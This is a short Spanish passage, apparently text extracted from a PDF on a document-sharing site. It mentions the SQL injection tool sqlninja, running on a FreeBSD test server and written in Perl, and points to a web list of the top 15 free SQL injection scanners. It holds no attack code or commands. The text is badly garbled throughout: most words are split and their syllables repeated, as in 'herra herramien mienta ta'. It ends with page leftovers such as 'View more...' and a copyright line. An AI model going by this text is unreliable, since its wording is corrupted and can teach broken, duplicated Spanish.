SQLninja. Aquí vemos vemos la herra herramien mienta ta sqlnin sqlnin ja eje ejecu cuta tada da sobre sobre una shell de FreeBSD 5.5 (servi (servidor dor de testeo), testeo), ente entera ramen mente te progra programa mada da en Perl por su autor autor icesur icesurfer. fer.

Herramien He rramient tas de SQL Injection En www.se www.secu curity-hacks rity-hacks.com .com/2007/05/18/top-15-free-sql-in /2007/05/18/top-15-free-sql-in jec  jection-scan tion-scanners, ners, pode podemos mos encon en contrar trar un lista listado do con el top 15 de las herra he rramien mientas tas de SQL in jec  jection, tion, con algu algunos nos deta de talles lles sobre sobre cada cada una de ella y el enla enlace ce al sitio sitio del que podre podremos mos descar descargar garla. la.

180

 

View more...

Comments

Copyright ©2017 KUPDF Inc.
SUPPORT KUPDF